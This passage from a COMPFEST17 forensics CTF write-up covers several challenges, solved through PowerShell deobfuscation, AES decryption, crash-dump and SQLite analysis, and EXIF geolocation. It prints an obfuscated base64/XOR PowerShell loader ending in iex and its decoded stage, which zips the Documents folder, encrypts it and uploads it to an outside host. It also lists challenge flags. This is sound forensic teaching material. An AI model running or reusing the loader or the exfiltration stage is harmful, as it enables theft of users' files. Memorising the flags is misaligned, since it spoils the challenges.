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Ag/OTtdJAc0XwkpIl40BzUXNDkgKjc5IzU/KTUUDgc3HTcHIx0/KTkHCTkiJic5IwkjOSYVIDk3CSc5Nx8nKT8VICkiDicpIjcnKSABNzkiXzcHNxs0BzcFNyk3LicpNw4jOQ9ZNAc0Hjc5NFU0OT1fNBcgAwkpI1Q0BzQVNDkgKjcpIwUkByQEIxcjBCQ5NxcOOTkGCQc0Hw4pNyw7ByMEOyk3HiApN18kKT0EJwc3IDs5Ig4nFwxZJAcjWCc5Nxk4FzdcJCkjFSQXICQnKT4aPDkgGyQ5NAcOBw9YDikiFA4XI1oOByFfDjkjBQkpIwoJFyAXDgcgCwk5IAEJFyAaDgc3HTQ5Nxc3FzwGNxc0ADcHNDo3Bw4FNzkiBzQpIlk3OTVeNAcjDjc5I0Y0FzxdNBcgNTcHIBQ0OScVNDk0IDs5Igc7Bz9ZOBcjNDsHIz87BztcOCkjWTgXIEY4Bz0UODkgJDspIAU4KT0APzk3XjwpNx8/Fw8HPwc0OT85NAY8OSdYPCkiKT8XIyQ/KQtfPDkjAj8pI1s/FzgXPAcgJD85IDQ/OQlYICkiBSMXI1kjFwlfIDkjPyMpI14gFw4XIAcgFSA5IBojOSMaIBcjBiQpNyIjByQUPDkgHz85IkY0OThYNDkiHjw5Ijg/BwlYPAcgKj8HIBc8Fz4UPAcgPz8HIBo8Bz4VPDkgBD85IAk/KTQVPDkgJT85IAE8KQwVPDkgFD85IAA/ByYVPDkgLj85IF48OToVPDkgVD8pI14nFydUICUnSkpFCgMEHxk+WVsIHgwvAAIfK1dXMBkfCBsDAi5DAAgZHhQ+NkUKAwQfGT4ZCCpDVSs5OFdXMAoDBAkCDgMoQxkVCDlDAAgZHhQ+NkpWSR82QFxDQ0BFSR9DIQgDChkFRDBNQAcCBANNSkpNEU0ECBU=';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd

The above code can be simplified to:

1
$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd

By changing the iex at the end to Write-Host, we can make the script output the decrypted result:

1
$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};Write-Host $rd

Running it gives:

1
$r ='...' | iex

By removing the | iex part layer by layer and re-running the script, we eventually deobfuscate it to the final layer:

1
$AAAAAAAAAAAAAABBBBBIIIiiAB='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&()_+-=[]{}~';$aadsfjkh=-join((1..15)|ForEach{$AAAAAAAAAAAAAABBBBBIIIiiAB[(Get-Random -Maximum $AAAAAAAAAAAAAABBBBBIIIiiAB.Length)]});$fnsdadkj="$env:TEMP\$aadsfjkh.zip";$cvmz="$env:TEMP\$aadsfjkh.enc";try{Get-ChildItem "$env:USERPROFILE\Documents" -Recurse -File|Where-Object{-not $_.PSIsContainer -and $_.Name -notlike "*transcript*" -and $_.Name -notlike "*.tmp"}|Compress-Archive -DestinationPath $fnsdadkj -CompressionLevel Fastest -ErrorAction SilentlyContinue;if(Test-Path $fnsdadkj){$pqoero=New-Object byte[] 16;$dma=New-Object byte[] 16;$zfsfdm=[System.Security.Cryptography.RNGCryptoServiceProvider]::Create();$zfsfdm.GetBytes($pqoero);$zfsfdm.GetBytes($dma);$zfsfdm.Dispose();$dmafnaas=[System.Security.Cryptography.Aes]::Create();$dmafnaas.Key=$pqoero;$dmafnaas.IV=$dma;$encryptor=$dmafnaas.CreateEncryptor();$dfnalkns=[System.IO.File]::ReadAllBytes($fnsdadkj);$agbaghb=$encryptor.TransformFinalBlock($dfnalkns,0,$dfnalkns.Length);$dmafnaas.Dispose();$combinedBytes=$pqoero+$agbaghb+$dma;[System.IO.File]::WriteAllBytes($cvmz,$combinedBytes);Remove-Item $fnsdadkj -Force -ErrorAction SilentlyContinue;iwr -Uri "http://192.168.18.76:8080/upload" -Method Post -InFile $cvmz -ContentType "application/octet-stream" -Headers @{"X-Filename"=(Split-Path $cvmz -Leaf)} -ErrorAction SilentlyContinue|Out-Null;if(Test-Path $cvmz){Remove-Item $cvmz -Force -ErrorAction SilentlyContinue}}}catch{}

The file transferred to /upload can be extracted from the traffic capture. This is the ciphertext.

We can write a Python script to recover this file:

  1. Read the .enc file.
  2. Split the file into three parts: the first 16 bytes are the Key, the last 16 bytes are the Initialization Vector (IV), and the middle part is the encrypted data.
  3. Use the extracted Key and IV to perform AES decryption on the encrypted data.
  4. Remove the padding from the end of the decrypted data.
  5. Save the final plaintext data as a .zip file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import sys

# --- Configuration ---
encrypted_file_path = "upload"
decrypted_zip_path = "decrypted.zip"
# ---------------------

def decrypt_file():
    """Reads the .enc file, extracts Key/IV, decrypts, and saves the original .zip file."""
    
    print(f"[*] Reading the encrypted file: '{encrypted_file_path}'")

    with open(encrypted_file_path, "rb") as f:
        full_data = f.read()

    # Step 1: Extract the Key, IV, and Ciphertext from the file structure
    key = full_data[:16]
    iv = full_data[-16:]
    ciphertext = full_data[16:-16]
    
    print("[+] File components extracted successfully.")
    print(f"    -> AES Key (HEX): {key.hex()}")
    print(f"    -> AES IV (HEX):  {iv.hex()}")

    try:
        # Step 2: Create an AES cipher object in CBC mode
        cipher = AES.new(key, AES.MODE_CBC, iv)
        
        # Step 3: Decrypt the ciphertext and unpad it (PKCS7 padding is default)
        decrypted_padded_data = cipher.decrypt(ciphertext)
        original_data = unpad(decrypted_padded_data, AES.block_size)

    except Exception as e:
        print(f"\n[!] An unexpected error occurred during decryption: {e}")
        sys.exit(1)
        
    # Step 4: Save the decrypted bytes to a .zip file
    with open(decrypted_zip_path, "wb") as f:
        f.write(original_data)

if __name__ == "__main__":
    decrypt_file()

After decompressing the zip file, the flag is found inside a PDF file.

FLAG

1
COMPFEST17{powershell_script_logging_is_very_powerfull_b4ffdc5da5}

crash out

Challenge

Evan installed and executed a supposedly safe file. It caused his laptop to hang, several data to become corrupted, and new password-protected files to show up. The password popped up for a while, but I didn’t memorize it. Can you get me back my file?

Solution

First, I mounted the image using FTK as the F drive.

I started by finding a genuinely encrypted zip file at F:\Users\Evan\Documents\89a0b289f0221.zip, but I couldn’t figure out the password.

Then, I located the file F:\Users\Evan\Downloads\upload_queue\file.enc. The strange thing about this file was that its header was that of a JPG, but it couldn’t be opened correctly after changing the extension to .jpg. This led me to suspect it was encrypted.

Next, I found a suspicious file: F:\ProgramData\Dumps\chrome_updater.exe.34368.dmp. Attempting to open it with WinDbg resulted in an error, so I resorted to analyzing the strings within it.

Searching for 89a0b289f0221.zip or file.enc inside the dump led me to this line:

COMPFEST17-1

1
C:\\Users\\Evan\\Documents\\89a0b289f0221.zip whereourcrashis --flag= --crash= null div raise --wait= --path= C:\\Users\\Evan\\Downloads\\upload_queue\\file.enc chrome_updater.exe
  1. chrome_updater.exe: This is the executed program. Based on its name, it’s likely an updater for a Chromium-based application, which fits the challenge description of a “supposedly safe file”.
  2. –crash= null div raise: This parameter explicitly instructs the program to perform an operation that will cause a crash.
    • null: Likely represents a “null pointer dereference”.
    • div: Likely represents a “division-by-zero error”.
    • raise: Likely represents “throwing an exception”.
  3. whereourcrashis: This string is very colloquial, like a comment left by a developer. This ties into the theme of the challenge, not only confirming that this file is essential to the solution but also suggesting that the string itself will be very useful later.

I then tried to find chrome_updater.exe for reverse engineering but couldn’t locate it. However, during the search, I found a related Windows Error Reporting (WER) file: F:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_chrome_updater.e_7b71673944fedcfebbd880da83474929a7d18741_38b31a53_7dfb28da-126b-49f8-a06-216c4072ac0a\Report.wer. It contained the following content:

1
2
3
4
5
EventType=APPCRASH
...
Sig[6].Name=Exception Code
Sig[6].Value=c0000005
...
  1. EventType=APPCRASH: The event type is an application crash.
  2. Sig[6].Name=Exception Code; Sig[6].Value=c0000005: c0000005 is the Windows exception code for an access violation. The most common cause of this exception is a null pointer dereference—that is, the program attempted to read from or write to a NULL memory address.

This matched my earlier speculation, confirming that chrome_updater.exe, 89a0b289f0221.zip, and file.enc are highly relevant files for this challenge. The meaningful string whereourcrashis from the command line is also very likely related.

Connecting the dots—I couldn’t find the password for 89a0b289f0221.zip, and the string whereourcrashis appeared right next to the zip file in the command—it was reasonable to infer that whereourcrashis was the password for 89a0b289f0221.zip. Trying it confirmed this suspicion.

After decompressing 89a0b289f0221.zip, I obtained a script for file encryption named script.py, with the following content:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import sys
import hashlib
import getpass

HEADER_SIZE = 16
def derive_key(password: str, length: int = 32) -> bytes:
    return hashlib.sha256(password.encode()).digest()[:length]

def transform(byte, key_byte, i):
    xored = byte ^ key_byte
    rotation = i % 3
    return ((xored << rotation) | (xored >> (8 - rotation))) & 0xFF

def encrypt(input_file, output_file, password):
    key = derive_key(password)

    with open(input_file, 'rb') as f:
        data = f.read()

    encrypted = bytearray(data[:HEADER_SIZE])

    for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE):
        key_byte = key[i % len(key)] ^ (i & 0x0F)
        encrypted.append(transform(byte, key_byte, i))

    with open(output_file, 'wb') as f:
        f.write(encrypted)

    print(f"Encrypted {input_file} -> {output_file}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage:")
        print("python3 script.py encrypt input.jpg output.enc")
        sys.exit(1)

    mode, input_file, output_file = sys.argv[1:4]
    password = getpass.getpass("Enter password: ")

    if mode == "encrypt":
        encrypt(input_file, output_file, password)
    else:
        print("Invalid")

I noticed the usage example was python3 script.py encrypt input.jpg output.enc. Considering the file.enc I had found, it was highly probable that it was encrypted by this very script. Therefore, I wrote a corresponding decryption script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import sys
import hashlib
import getpass

HEADER_SIZE = 16

def derive_key(password: str, length: int = 32) -> bytes:
    """与加密脚本完全相同的密钥派生函数。"""
    return hashlib.sha256(password.encode()).digest()[:length]

def untransform(byte, key_byte, i):
    """
    这是 transform 函数的逆函数。
    1. 计算旋转位数。
    2. 执行循环右移(ROR),这是循环左移(ROL)的逆操作。
    3. 执行异或(XOR),这是其自身的逆操作。
    """
    rotation = i % 3
    # 循环右移 (ROR)
    rotated_byte = ((byte >> rotation) | (byte << (8 - rotation))) & 0xFF
    # 异或 (XOR)
    original_byte = rotated_byte ^ key_byte
    return original_byte

def decrypt(input_file, output_file, password):
    key = derive_key(password)

    with open(input_file, 'rb') as f:
        data = f.read()

    # 解密文件的前16字节头部是原文,直接复制
    decrypted = bytearray(data[:HEADER_SIZE])

    # 从第17个字节(索引16)开始循环解密
    for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE):
        # 1. 生成与加密时完全相同的 key_byte
        key_byte = key[i % len(key)] ^ (i & 0x0F)
        
        # 2. 调用逆向转换函数
        decrypted_byte = untransform(byte, key_byte, i)
        decrypted.append(decrypted_byte)

    with open(output_file, 'wb') as f:
        f.write(decrypted)

    print(f"Decrypted {input_file} -> {output_file}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage:")
        print("python3 script.py decrypt input.enc output.jpg")
        sys.exit(1)

    mode, input_file, output_file = sys.argv[1:4]
    password = getpass.getpass("Enter password: ")

    if mode == "decrypt":
        decrypt(input_file, output_file, password)
    else:
        print("Invalid mode. Use 'decrypt'.")

Both encryption and decryption require a password. So far, the only password-like string I had encountered was whereourcrashis. I used it to decrypt file.enc, and as expected, it successfully decrypted into a JPG image.

There was only the image with no other information, so I suspected steganography. While checking the image’s EXIF information, I found a clue:

1
2
Exif Image Width                : 1080
Exif Image Height               : 1080

The EXIF information indicated the image dimensions were 1080x1080, but the actual size of the image was 1080x1024. This was clearly a case of JPG height/width steganography. After correcting the height, the flag was revealed at the bottom of the image.

FLAG

1
COMPFEST17{cr4sh1ng_1nt0_th3_v0001d_b00m_boOm_B00M!!_b51a77934b}

Mr & Mrs Smith

Challenge

A couple in our office has been rather suspicious these past few weeks, though I cant do much as the guy’s father hold an authorative position. A few days ago he asked me to help back up his phone, and I managed to keep several information just in case I find something to prove my suspicions. Hmm, what does he usually do with his phone?

Chall: https://drive.google.com/drive/folders/1mM3LckA_NZ5O-NskteQOE_8V-R7_g-Dk?usp=sharing

Zip password : 2a07b93ef0362ba7286d536ac1e16c17

Solution

In the SQLite Files section, by sorting by modification date in descending order, we can see that only two files were modified in 2025: bugle_db.db on 2025-08-20, and calendar.db on 2025-08-12.

COMPFEST17-2

The bugle_db.db file stores the phone’s SMS messages. Let’s examine it for any useful information.

COMPFEST17-3

In the message_text table, the following conversation was found:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
Hey, did you finish documenting the warehouse issues?
Yes, I have all the photos and safety violation reports ready
Perfect. The board meeting is next week, we need to be ready
I know. Dad's going to be furious but people could get seriously hurt
The chemical storage violations alone could kill someone
I uploaded everything to our secure drive
Which one? We have multiple backup locations
We upload our work here: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing
Great! What's the access code again?
It's encrypted with the date of our first date-location, like 23122025-londonbridge
Got it! The evidence package is solid. All papers, financial docs, everything. I'm pretty shocked to hear that you remember our anniversary.
Yeah, I always keep a reminder of important dates and events on my phone. Anyways, I know this is hard with your family situation, but we're doing the right thing
Agreed. I'll submit to the regulatory board next week
Thanks for having my back on this. The safety violations are too serious to ignore
Always. We have to protect the workers, even if it costs us our jobs
The photos from the scanner app should be the final piece we need
Perfect. See you at our usual spot later to go over the timeline?
Yes. Same time as our anniversary dinner reservation 😉
How was work today sweetie?
Busy as usual. Lots of documentation work
Don't work too hard! Remember family dinner Sunday
Wouldn't miss it mom ❤️
Thanks for dinner last night! Love you ❤️
Poker night this Friday?
Can't this week, working on a big project
Everything OK? You've been busy lately
Just some important stuff at work. Rain check?
Game night tomorrow at 8?
Safety inspection results are in
When can we discuss them?
Let's schedule something private
Agreed. Too many ears in the office
Meeting moved to 2 PM
Want to grab lunch today?
Can't today, buried in paperwork
You've been stressed lately. Everything OK?
Just work stuff. Nothing I can't handle
Coffee later?
The quarterly reports are due next week
I'm working on the safety compliance section
Make sure everything is thoroughly documented
Project update needed ASAP
Hey go and watch this https://youtu.be/eVpKuSGM_-E?si=SJn01Vi5Aw-bQJPm
What's that
Something important
Package delivery attempted
I wasn't expecting anything
Your package has been delivered
John, we need to discuss the safety audit results
Of course. When would be convenient?
Tomorrow morning, 8 AM sharp. Don't be late
I'll be there sir
And John... keep this between us for now

A Google Drive link is mentioned in the conversation: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing

COMPFEST17-4

Inside this Google Drive folder, an encrypted file named classified.pdf.gpg was found.

From the conversation, we can also gather the following information:

The couple is not having an affair; they are actually whistleblowers. They are secretly collecting evidence of serious safety violations in the company’s warehouse and plan to submit it to the regulatory board next week to protect the workers. The man’s father is a high-ranking executive in the company, which adds significant pressure and risk to their investigation, explaining their need for secrecy.

"Great! What's the access code again?" "It's encrypted with the date of our first date-location, like 23122025-londonbridge" This exchange reveals the password format for the file in Google Drive: DDMMYYYY-locationname. The location format is all lowercase with no spaces (e.g., londonbridge). The next step is to find the date and location of their first date.

"I'm pretty shocked to hear that you remember our anniversary." "Yeah, I always keep a reminder of important dates and events on my phone. These two lines imply that the date of their first date is recorded on the phone. Following this lead, we’ll now examine calendar.db.

In record #16 of the Event table, we find an “Anniversary” event with the description We started dating, and took a picture to commemorate it. The dtstart timestamp is 1583193600000, and the eventTimezone is America/New_York. Converting this timestamp gives us the date March 3, 2020. This provides the first part of the password: 03032020.

COMPFEST17-5

Following the clue from the record, “took a picture to commemorate it,” we now look for the photo. By filtering the images for a modification date between March 2, 2020, and March 4, 2020, we find a single image:

COMPFEST17-6

Below is its EXIF information:

1
2
3
4
5
6
7
8
9
...
Software                        : Our first date
Modify Date                     : 2020:03:03 14:30:00
Date/Time Original              : 2020:03:03 14:30:00
Create Date                     : 2020:03:03 14:30:00
...
GPS Latitude                    : 40 deg 47' 6.32" N
GPS Longitude                   : 73 deg 58' 5.82" W
GPS Position                    : 40 deg 47' 6.32" N, 73 deg 58' 5.82" W

Next, searching for 40°47'06.3"N 73°58'05.8"W on Google Maps reveals that the photo was taken in Central Park:

COMPFEST17-7

Therefore, the second part of the password is centralpark. Combining both parts, the full password is 03032020-centralpark.

Next, we use the password 03032020-centralpark to decrypt the classified.pdf.gpg file:

1
2
┌──(kali㉿kali)-[~/Desktop]
└─$ gpg --decrypt classified.pdf.gpg > classified.pdf

The flag is found in the decrypted classified.pdf file.

COMPFEST17-8

FLAG

1
COMPFEST17{p4rtners_wh0_w0rk_t0gether_t00_w3ll_5b3c71c672}

Update Required

Challenge

A researcher in Mondstadt’s tech division received an urgent-looking HTML file, claiming to be a critical security patch. Trusting its source, they executed antivirus.exe and moments later, a secret PDF file disappeared.

The PDF contained a confidential override PIN tied to the Vision Distribution Network. To protect it, the researcher locked the PDF with their wallet’s seed phrase (exported from a Chrome extension), joined with an underscore (_) as the password.

Although the wallet vault file remains on disk, the password to unlock it has since been lost. Fortunately, there’s a lead: the researcher once copied the vault password to clipboard.

Chall: https://drive.google.com/drive/folders/1R1psX7e04W1aJXFHK_WbNkRt5ukFXOlc?usp=sharing

